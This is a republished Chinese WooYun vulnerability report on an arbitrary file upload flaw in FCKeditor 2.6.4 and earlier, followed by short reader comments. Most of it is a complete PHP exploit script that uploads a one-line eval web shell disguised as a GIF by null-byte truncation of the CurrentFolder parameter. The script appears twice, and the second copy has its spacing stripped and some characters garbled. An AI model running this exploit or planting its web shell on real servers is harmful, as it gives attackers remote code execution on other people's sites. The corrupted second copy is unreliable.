漏洞概要

缺陷編號：WooYun-2011-01684

漏洞標題：fckeditor <= 2.6.4 任意文件上傳漏洞

相關廠商：fckeditor

漏洞作者：我勒個去

提交時間：2011-03-22 14:09

公開時間：2011-03-22 14:18

漏洞類型：文件上傳導致任意代碼執(zhí)行

危害等級：高

自評Rank：20

漏洞狀態(tài)：未聯系到廠商或者廠商積極忽略

Tags標簽：

漏洞詳情

披露狀態(tài)：

2011-03-22: 積極聯系廠商并且等待廠商認領中，細節(jié)不對外公開

2011-03-22: 廠商已經主動忽略漏洞，細節(jié)向公眾公開

簡要描述：

fckeditor <= 2.6.4 任意文件上傳漏洞, php coldfunsion應該KO了，asp表示很淡定，其他語言版本未測

詳細說明：

currentfolder過濾不給力啊，但是GPC就能讓它腦殘

漏洞證明：

set_time_limit(0);

ini_set("default_socket_timeout", 5);define(STDIN, fopen("php://stdin", "r"));

$match = array();function http_send($host, $packet)

{

$sock = fsockopen($host, 80);

while (!$sock)

{

print "\n[-] No response from {$host}:80 Trying again...";

$sock = fsockopen($host, 80);

}

fputs($sock, $packet);

while (!feof($sock)) $resp .= fread($sock, 1024);

fclose($sock);

print $resp;

return $resp;

}function connector_response($html)

{

global $match;

return (preg_match("/OnUploadCompleted\((\d),\"(.*)\"\)/", $html, $match) && in_array($match[1], array(0, 201)));

}print "\n+------------------------------------------------------------------+";

print "\n| FCKEditor Servelet Arbitrary File Upload Exploit by Wolegequ |";

print "\n+------------------------------------------------------------------+\n";if ($argc < 3)

{

print "\nUsage......: php $argv[0] host path\n";

print "\nExample....: php $argv[0] localhost /\n";

print "\nExample....: php $argv[0] localhost /FCKEditor/\n";die();

}$host = $argv[1];

$path = ereg_replace("(/){2,}", "/", $argv[2]);$filename = "fvck.gif";

$foldername = "fuck.php%00.gif";

$connector = "editor/filemanager/connectors/php/connector.php";$payload = "-----------------------------265001916915724\r\n";

$payload .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"{$filename}\"\r\n";

$payload .= "Content-Type: image/jpeg\r\n\r\n";

$payload .= 'GIF89a'."\r\n".'<?php eval($_POST[a]) ?>'."\n";

$payload .= "-----------------------------265001916915724--\r\n";$packet = "POST {$path}{$connector}?Command=FileUpload&Type=Image&CurrentFolder=".$foldername." HTTP/1.0\r\n";

//print $packet;

$packet.= "Host: {$host}\r\n";$packet .= "Content-Type: multipart/form-data; boundary=---------------------------265001916915724\r\n";

$packet .= "Content-Length: ".strlen($payload)."\r\n";

$packet .= "Connection: close\r\n\r\n";

$packet .= $payload;print $packet;if (!connector_response(http_send($host, $packet))) die("\n[-] Upload failed!\n");

else print "\n[-] Job done! try http://${host}/$match[2] \n";?>

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

set_time_limit(0);

ini_set("default_socket_timeout",5);define(STDIN,fopen("php://stdin","r"));

$match=array();functionhttp_send($host,$packet)

{

$sock=fsockopen($host,80);

while(!$sock)

{

print"\n[-] No response from {$host}:80 Trying again...";

$sock=fsockopen($host,80);

}

fputs($sock,$packet);

while(!feof($sock))$resp.=fread($sock,1024);

fclose($sock);

print$resp;

return$resp;

}functionconnector_response($html)

{

global$match;

return(preg_match("/OnUploadCompleted\((\d),\"(.*)\"\)/",$html,$match)&&in_array($match[1],array(0,201)));

}print"\n+------------------------------------------------------------------+";

print"\n| FCKEditor Servelet Arbitrary File Upload Exploit by Wolegequ???? |";

print"\n+------------------------------------------------------------------+\n";if($argc<3)

{

print"\nUsage......: php $argv[0] host path\n";

print"\nExample....: php $argv[0] localhost /\n";

print"\nExample....: php $argv[0] localhost /FCKEditor/\n";die();

}$host=$argv[1];

$path=ereg_replace("(/){2,}","/",$argv[2]);$filename="fvck.gif";

$foldername="fuck.php%00.gif";

$connector="editor/filemanager/connectors/php/connector.php";$payload="-----------------------------265001916915724\r\n";

$payload.="Content-Disposition: form-data; name=\"NewFile\"; filename=\"{$filename}\"\r\n";

$payload.="Content-Type:??image/jpeg\r\n\r\n";

$payload.='GIF89a'."\r\n".'<?phpeval ($_POST[a])?>'."\n";

$payload.="-----------------------------265001916915724--\r\n";$packet="POST {$path}{$connector}?Command=FileUpload&Type=Image&CurrentFolder=".$foldername." HTTP/1.0\r\n";

//print $packet;

$packet.="Host: {$host}\r\n";$packet.="Content-Type: multipart/form-data; boundary=---------------------------265001916915724\r\n";

$packet.="Content-Length: ".strlen($payload)."\r\n";

$packet.="Connection: close\r\n\r\n";

$packet.=$payload;print$packet;if(!connector_response(http_send($host,$packet)))die("\n[-] Upload failed!\n");

elseprint"\n[-] Job done! try http://${host}/$match[2] \n";?>

修復方案：

參見**.**.**.**修復

漏洞回應

廠商回應：

未能聯系到廠商或者廠商積極拒絕

漏洞Rank：12 (WooYun評價)

評價

2010-01-01 00:00 xsser 白帽子 | Rank:152 漏洞數:17)

拜

2010-01-01 00:00 Jacks 白帽子 | Rank:142 漏洞數:25)

這個code怎么那么熟悉？不是EgiX 寫的那個？

2010-01-01 00:00 m0r5 白帽子 | Rank:30 漏洞數:6)

這不是是EgiX 寫的那個？

2010-01-01 00:00 霍家二爺 白帽子 | Rank:63 漏洞數:7)

http://seclists.org/pen-test/2010/Jul/0

截斷呀截斷

2010-01-01 00:00 G8dSnow 白帽子 | Rank:21 漏洞數:5)

截斷各處中招，xss和文件操作都有。。。傷不起。。。

所有媒體，可在保留署名、原文連接的情況下轉載，若非則不得使用我方內容。

關注網絡安全，分享和記錄有趣的資源內容。體驗盒子所發(fā)布的一切資源僅限用于學習和研究目的。不得用于非法用途，否則，一切后果請用戶自負。

2006-2019 體驗盒子

×

掃碼分享

驗證：體驗盒子

掃碼分享

×

總結

以上是生活随笔為你收集整理的fckeditor 2.6 php,fckeditor = 2.6.4 任意文件上传漏洞的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。